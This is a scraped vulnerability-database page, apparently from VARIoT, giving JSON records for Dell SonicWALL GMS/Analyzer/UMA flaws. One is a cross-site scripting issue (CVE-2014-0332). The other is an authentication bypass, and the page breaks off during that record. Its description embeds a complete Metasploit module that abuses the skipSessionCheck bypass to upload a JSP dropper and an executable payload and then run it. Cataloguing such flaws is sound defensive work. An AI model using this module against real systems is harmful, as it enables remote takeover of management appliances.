"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "127575"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-611"
}
],
"trust": 0.7
}
}
var-201402-0269
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action. (CWE-79). DELL Provided by SonicWALL GMS/Analyzer/UMA Contains a cross-site scripting vulnerability. DELL Provided by SonicWALL GMS/Analyzer/UMA In /sgms/mainPage of node_id There is a problem with parameter processing and cross-site scripting (CWE-79) Vulnerabilities exist. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') http://cwe.mitre.org/data/definitions/79.htmlAn arbitrary script may be executed on the user's web browser. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following products prior to version 7.1 SP1 are vulnerable: Dell SonicWALL Global Management System Dell SonicWALL Analyzer Dell SonicWALL Universal Management Appliance E5000. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0269",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.1"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "dell computer",
"version": null
},
{
"model": "sonicwall analyzer",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "vesion 7.1 sp1"
},
{
"model": "sonicwall global management system",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "vesion 7.1 sp1"
},
{
"model": "sonicwall universal management appliance e5000 software",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "vesion 7.1 sp1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_e5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0332"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "William Costa",
"sources": [
{
"db": "BID",
"id": "65498"
}
],
"trust": 0.3
},
"cve": "CVE-2014-0332",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 4.3,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 0.8,
"exploitability": "UNPROVEN",
"exploitabilityScore": 8.6,
"id": "CVE-2014-0332",
"impactScore": 2.9,
"integrityImpact": "NONE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "NOT DEFINED",
"reportConfidence": "UNCOFIRMED",
"severity": "MEDIUM",
"targetDistribution": "LOW",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-0332",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-67825",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-0332",
"trust": 2.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-210",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-67825",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "VULHUB",
"id": "VHN-67825"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action. (CWE-79). DELL Provided by SonicWALL GMS/Analyzer/UMA Contains a cross-site scripting vulnerability. DELL Provided by SonicWALL GMS/Analyzer/UMA In /sgms/mainPage of node_id There is a problem with parameter processing and cross-site scripting (CWE-79) Vulnerabilities exist. CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027) http://cwe.mitre.org/data/definitions/79.htmlAn arbitrary script may be executed on the user\u0027s web browser. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nThe following products prior to version 7.1 SP1 are vulnerable:\nDell SonicWALL Global Management System\nDell SonicWALL Analyzer\nDell SonicWALL Universal Management Appliance E5000. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "BID",
"id": "65498"
},
{
"db": "VULHUB",
"id": "VHN-67825"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67825",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67825"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-0332",
"trust": 3.6
},
{
"db": "CERT/CC",
"id": "VU#727318",
"trust": 3.6
},
{
"db": "BID",
"id": "65498",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "103216",
"trust": 1.1
},
{
"db": "JVN",
"id": "JVNVU95736801",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "56906",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125180",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67825",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "VULHUB",
"id": "VHN-67825"
},
{
"db": "BID",
"id": "65498"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"id": "VAR-201402-0269",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67825"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:29:46.993000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability (PDF)",
"trust": 0.8,
"url": "http://www.sonicwall.com/us/shared/download/support_bulletin_gms_vulnerability_xss_resolved_in_7.1_sp2_and_7.2.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 2.7
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "VULHUB",
"id": "VHN-67825"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.sonicwall.com/us/shared/download/support_bulletin_gms_vulnerability_xss_resolved_in_7.1_sp2_and_7.2.pdf"
},
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"trust": 1.6,
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/65498"
},
{
"trust": 1.1,
"url": "http://osvdb.org/103216"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0332"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu95736801/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0332"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/56906"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "VULHUB",
"id": "VHN-67825"
},
{
"db": "BID",
"id": "65498"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#727318"
},
{
"db": "VULHUB",
"id": "VHN-67825"
},
{
"db": "BID",
"id": "65498"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-11T00:00:00",
"db": "CERT/CC",
"id": "VU#727318"
},
{
"date": "2014-02-14T00:00:00",
"db": "VULHUB",
"id": "VHN-67825"
},
{
"date": "2014-02-11T00:00:00",
"db": "BID",
"id": "65498"
},
{
"date": "2014-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"date": "2014-02-14T16:55:08.030000",
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-17T00:00:00",
"db": "CERT/CC",
"id": "VU#727318"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-67825"
},
{
"date": "2015-03-19T09:15:00",
"db": "BID",
"id": "65498"
},
{
"date": "2014-02-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001394"
},
{
"date": "2018-03-12T17:23:19.040000",
"db": "NVD",
"id": "CVE-2014-0332"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DELL SonicWALL GMS/Analyzer/UMA contains a cross-site scripting (XSS) vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#727318"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-210"
}
],
"trust": 0.6
}
}
var-202002-0532
Vulnerability from variot
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
web site for more information on licensing and terms of use.
http://metasploit.com/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in SonicWALL GMS. It exploits two
vulnerabilities in order to get its objective. An authentication bypass in the
Web Administration interface allows to abuse the "appliance" application and upload
an arbitrary payload embedded in a JSP. The module has been tested successfully on
SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
successfully while testing, shell payload have been used.
},
'Author' =>
[
'Nikolas Sotiriu', # Vulnerability Discovery
'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1359'],
[ 'OSVDB', '89347' ],
[ 'BID', '57445' ],
[ 'EDB', '24204' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 17 2012'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
], self.class)
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def generate_jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
jspraw = "<%@ page import=\"java.io.*\" %>\n"
jspraw << "<%\n"
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
jspraw << "String #{var_data} = \"\";\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
jspraw << "}\n"
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
jspraw << "#{var_inputstream}.close();\n"
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
jspraw << "{\n"
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
jspraw << "#{var_comb} <<= 4;\n"
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
jspraw << "}\n"
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
jspraw << "#{var_outputstream}.close();\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
jspraw << "String[] #{var_fperm} = new String[3];\n"
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
jspraw << "#{var_fperm}[1] = \"+x\";\n"
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
# Linux and other UNICES allow removing files while they are in use...
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
jspraw << "} else {\n"
# Windows does not ..
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
jspraw << "%>\n"
return jspraw
end
def get_install_path
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'connection' => 'TE, close',
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'vars_post' => {
'num' => '123456',
'action' => 'show_diagnostics',
'task' => 'search',
'item' => 'application_log',
'criteria' => '*.*',
'width' => '500'
}
})
if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
return $1
end
return nil
end
def upload_file(location, filename, contents)
post_data = Rex::MIME::Message.new
post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'connection' => 'TE, close'
})
if res and res.code == 200 and res.body.empty?
return true
else
return false
end
end
def check
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
if get_install_path.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
install_path = get_install_path
if install_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "linux"
@location = "#{install_path}webapps/appliance/"
elsif target['Platform'] == "win"
@location = "#{install_path}webapps\\appliance\\"
end
# Upload the JSP and the raw payload
@jsp_name = rand_text_alphanumeric(8+rand(8))
jspraw = generate_jsp
# Specify the payload in hex as an extra file..
payload_hex = payload.encoded_exe.unpack('H*')[0]
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
end
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
end
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
'method' => 'GET'
})
if res and res.code != 200
print_warning("#{@peer} - Error triggering the payload")
end
register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
end
end
Show details on source website{
"@context": {
